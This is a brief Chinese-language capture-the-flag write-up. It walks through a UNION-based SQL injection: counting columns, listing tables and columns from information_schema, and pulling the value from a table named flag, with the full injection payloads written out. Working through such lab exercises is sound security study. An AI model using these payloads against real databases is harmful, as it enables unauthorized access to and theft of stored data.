万能密码回显成功
查询字段数没有回显
那就联合查询union select
,从1试到1,2,3发现三个字段,而且回显位置是第二个
所以开始查询表名
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
出现了flag字段,开始查询flag表的字段名
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=`flag`#
字段名就叫flag
整理一下思路:
我们现在知道了放flag的表名就叫flag
我们知道了放flag的列在flag表的flag字段
接下来就直接去这个名为flag的表
里把字段为flag
的记录
查询出来
1' union select 1,flag,3 from flag#
大功告成